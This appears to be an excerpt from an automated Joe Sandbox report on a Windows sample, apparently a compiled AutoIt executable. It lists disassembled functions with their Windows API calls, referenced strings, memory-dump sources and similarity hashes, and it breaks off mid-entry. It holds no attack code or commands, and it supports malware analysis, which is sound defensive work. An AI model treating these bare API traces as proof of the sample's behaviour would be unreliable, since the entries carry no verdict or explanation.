Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00732F8D
LoadLibraryW.KERNEL32(?), ref: 00732F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00732FA9
DestroyWindow.USER32(?), ref: 00732FB1

Strings

SysAnimate32, xrefs: 00732F68

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: d127c6c868f57f3102ca3693a6252726ed327103cb409cfc3eb8bbaa6112d67f
Instruction ID: d68285b74e5203ae3847372c975ce7955e514ff714c914ad8fac11b654596c25
Opcode Fuzzy Hash: d127c6c868f57f3102ca3693a6252726ed327103cb409cfc3eb8bbaa6112d67f
Instruction Fuzzy Hash: 9B21FD7220420AEBFB114F64DC80EBB37BDEF59364F104618FA50E21A2C339DC829760

Function 006C4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006C4D1E,006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002), ref: 006C4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006C4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,006C4D1E,006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000), ref: 006C4DC3

Strings

mscoree.dll, xrefs: 006C4D86
CorExitProcess, xrefs: 006C4D98

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cdaf38c784d9dbf3f3d99b4dedd7d166ef8aaf7eefbae26c2f2cc7a5abf53dac
Instruction ID: 83a1d1d50c2a522f2ce0be0a7e5ecd7ba251543857385f302e4f9411459d12f7
Opcode Fuzzy Hash: cdaf38c784d9dbf3f3d99b4dedd7d166ef8aaf7eefbae26c2f2cc7a5abf53dac
Instruction Fuzzy Hash: 03F04475540208BBEB129F90DC49FEDBBB5EF44752F044198F906A2250DF786940DBD5

Function 006FD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 006FD3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006FD3BF
FreeLibrary.KERNEL32(00000000), ref: 006FD3E5

Strings

GetSystemWow64DirectoryW, xrefs: 006FD3B9
X64, xrefs: 006FD2A8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: d79a3c93b5489224e742256386cb07d48cf16124cba98667bf6ed2a273941607
Instruction ID: a913967dcc7a8e19b7a329be56d54fff654d5304aefd151cabd2ac70e356b050
Opcode Fuzzy Hash: d79a3c93b5489224e742256386cb07d48cf16124cba98667bf6ed2a273941607
Instruction Fuzzy Hash: B9F055B640563C9BFB3227108C089B93213AF12B02B54C098FB02F2218DB24EE80A7C7

Function 006A4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006A4EAE
FreeLibrary.KERNEL32(00000000,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 006A4EA8
kernel32.dll, xrefs: 006A4E94

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 0c98da27c944d55f8b603fd7ea61367df0014a760eee4bb204b078f80b20f182
Instruction ID: 6b1e6d01cc86676f33fbe6fa705ce319ab007768e2a098b542b079bc4f2b7f83
Opcode Fuzzy Hash: 0c98da27c944d55f8b603fd7ea61367df0014a760eee4bb204b078f80b20f182
Instruction Fuzzy Hash: EFE08676A016225BA22327256C18A9B6555BFC2B63B054115FC01F2201DFA8CD0196E4

Function 006A4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006A4E74
FreeLibrary.KERNEL32(00000000,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 006A4E6E
kernel32.dll, xrefs: 006A4E5B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 5494281018859f9330373ac347df10c1954f1ae30d79204497ab929ae583ebc9
Instruction ID: 5a6d64405b41d679a75cc6029d02460d2e030c3039db735b29123e927845af2f
Opcode Fuzzy Hash: 5494281018859f9330373ac347df10c1954f1ae30d79204497ab929ae583ebc9
Instruction Fuzzy Hash: 4AD0C2765026215766232B247C08DCB6A1ABFC2B123054111B801F2211CFA8CD01DAD4

Function 0072A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0072A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0072A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0072A468
CloseHandle.KERNEL32(?), ref: 0072A63D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: be7cf2d1584a7ebc6fe9ad7b5ce7fb2daf524d3c09e2761a8d7a181fc459f984
Instruction ID: a862be1d36c622c0ab4b2b6cd439ffda68f1790071efa43b77eba30b483644f5
Opcode Fuzzy Hash: be7cf2d1584a7ebc6fe9ad7b5ce7fb2daf524d3c09e2761a8d7a181fc459f984
Instruction Fuzzy Hash: 6AA1B171604300AFE760EF24D886F2AB7E6AF84714F14881DF55A9B2D2D774EC41CB96

Function 006DBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00743700), ref: 006DBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0077121C,000000FF,00000000,0000003F,00000000,?,?), ref: 006DBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00771270,000000FF,?,0000003F,00000000,?), ref: 006DBC36
_free.LIBCMT ref: 006DBB7F

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006DBD4B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: e56b1a01529acecfff5bd1b7d9b79127339443bd063a29736ff4fd03bd091a91
Instruction ID: b4577477c33abf5e2e906f2703304a461f3e604bf567b8219e9ce02c5a864dc0
Opcode Fuzzy Hash: e56b1a01529acecfff5bd1b7d9b79127339443bd063a29736ff4fd03bd091a91
Instruction Fuzzy Hash: 35510471D00209EBCB10EF698C819AEB7BAFF44350B12526FE454D7399EB709E409B58

Function 0070E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0070CF22,?), ref: 0070DDFD

Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0070CF22,?), ref: 0070DE16

Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A

lstrcmpiW.KERNEL32(?,?), ref: 0070E473
MoveFileW.KERNEL32(?,?), ref: 0070E4AC
_wcslen.LIBCMT ref: 0070E5EB
_wcslen.LIBCMT ref: 0070E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0070E650

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 57a586fd07c38986455bd23495c910b27ec26011e5154bb1731a776ed25daf7c
Instruction ID: a02badc2cf8fd2c1a0c59073e09f059cedca489f95abe6c5498bbf2bd22d858d
Opcode Fuzzy Hash: 57a586fd07c38986455bd23495c910b27ec26011e5154bb1731a776ed25daf7c
Instruction Fuzzy Hash: 2B5185B24083849BC764EB90DC81DDB73DDAF85340F004D1EF585D3191EE79A688876A

Function 0072B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0072BB63
RegCloseKey.ADVAPI32(?,?), ref: 0072BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0072BBB3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 2d0b65ac68325488d8db8e5b9209b7237ff4a030eb1e999cafe2a6215cd00bae
Instruction ID: a66ee4c84bbcfd65b4145fc5f23d9bcefbc37a8b972fa711fd8a289637f12273
Opcode Fuzzy Hash: 2d0b65ac68325488d8db8e5b9209b7237ff4a030eb1e999cafe2a6215cd00bae
Instruction Fuzzy Hash: 81619E71208241AFD714DF24D890E2ABBE5FF85308F14895CF49A8B2A2DB35ED45CB92

Function 00708BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00708BCD
VariantClear.OLEAUT32 ref: 00708C3E
VariantClear.OLEAUT32 ref: 00708C9D
VariantClear.OLEAUT32(?), ref: 00708D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00708D3B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 47a9677aa6cd7904e2148370d002bb540f25312e86c4c340310d7112019bb7de
Instruction ID: caa3178869c16f97606955d8415d3f7f022497c49eb6073668c2631738f30cce
Opcode Fuzzy Hash: 47a9677aa6cd7904e2148370d002bb540f25312e86c4c340310d7112019bb7de
Instruction Fuzzy Hash: 91516CB5A00219EFDB10CF68C884AAAB7F4FF8D310B158659E955DB350E734E911CF90

Function 00718AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00718BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00718BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00718C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00718C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00718C5F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: a92867ae02e4fba3e64d237cffe03563704db4fcf58c572278398707fef27779
Instruction ID: 4abd7b07affbde788f5eba9970c2fd665fbc75d7bc9cd5158e9eec6b9643f4dc
Opcode Fuzzy Hash: a92867ae02e4fba3e64d237cffe03563704db4fcf58c572278398707fef27779
Instruction Fuzzy Hash: 36515135A002149FCB45EF54C8819ADBBF6FF49314F048498E8496B362CB35ED51CFA5

Function 00728EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00728F40
GetProcAddress.KERNEL32(00000000,?), ref: 00728FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00728FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00729032
FreeLibrary.KERNEL32(00000000), ref: 00729052

Part of subcall function 006BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00711043,?,75C0E610), ref: 006BF6E6
Part of subcall function 006BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,006FFA64,00000000,00000000,?,?,00711043,?,75C0E610,?,006FFA64), ref: 006BF70D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 2346f86c10c3820cc2f03e87fc6ac498fd7acdd09cab3c5b80caa283de83a807
Instruction ID: c9343f59b80668b93442212dfd5bd1dff79c1a99b543d0975e53b22046a69094
Opcode Fuzzy Hash: 2346f86c10c3820cc2f03e87fc6ac498fd7acdd09cab3c5b80caa283de83a807
Instruction Fuzzy Hash: AB514734A012159FCB51EF58C4948A9BBF2FF49314F088098E90AAB362DB35ED85CF91

Function 00736B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00736C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00736C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00736C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0071AB79,00000000,00000000), ref: 00736C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00736CC7

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 188b87462965ceefe9bd137a8c072ce2f7a8cfa584f1e601965b126b6759d74a
Instruction ID: 34cc02223450b15d8e96ba58afe925e9c55271e4c6824c52ade64f9afdb6c19d
Opcode Fuzzy Hash: 188b87462965ceefe9bd137a8c072ce2f7a8cfa584f1e601965b126b6759d74a
Instruction Fuzzy Hash: 14411735600104BFFB24CF28CC58FA5BBA5EB09350F159268F899A72E2C379FD41CA60

Function 006D2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006D20C3
_free.LIBCMT ref: 006D20E3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bbf7dbc4252066e4352bdb06c5fb097d75aaf67452323d90e70bc21151d9fb0e
Instruction ID: e30bd8d2d9a8791e6b541578e562d8e605dd4f360cdc1f57f8c2e881b592bc49
Opcode Fuzzy Hash: bbf7dbc4252066e4352bdb06c5fb097d75aaf67452323d90e70bc21151d9fb0e
Instruction Fuzzy Hash: 5B41D372E00201AFCB20DF78CC90AADB3A6EF98314B1585AAE615EB351D631AD01CB80

Function 006B912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006B9141
ScreenToClient.USER32(00000000,?), ref: 006B915E
GetAsyncKeyState.USER32(00000001), ref: 006B9183
GetAsyncKeyState.USER32(00000002), ref: 006B919D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 2b62a5e5edd4c108a4d21ad1fa875db906c2cc9377143e6e41f04b3230596dbc
Instruction ID: b37a1195e7d84454d3ee4bceadc74b538fe2e3f37035ce4173bc498ddc494d83
Opcode Fuzzy Hash: 2b62a5e5edd4c108a4d21ad1fa875db906c2cc9377143e6e41f04b3230596dbc
Instruction Fuzzy Hash: 6541707190850AFBDF05DF68C848BFEB776FF05320F248229E525A7290C7345995DB61

Function 00713874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 007138CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00713922
TranslateMessage.USER32(?), ref: 0071394B
DispatchMessageW.USER32(?), ref: 00713955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00713966

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: d373a80a83920c3a0d01f0d71a5fe43b84db7de3e2ef9ebf28ca1f7acdc852c6
Instruction ID: 3f0c63d8bdf46a541fe139efdb548559e1183dbeeb5ec88f21b4ae164416eacf
Opcode Fuzzy Hash: d373a80a83920c3a0d01f0d71a5fe43b84db7de3e2ef9ebf28ca1f7acdc852c6
Instruction Fuzzy Hash: 3331C6705043419EEB35CB3C9849FF63BA8AB05348F544569E46A920E0E3BCB6C5CB25

Function 0071CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0071C21E,00000000), ref: 0071CF38
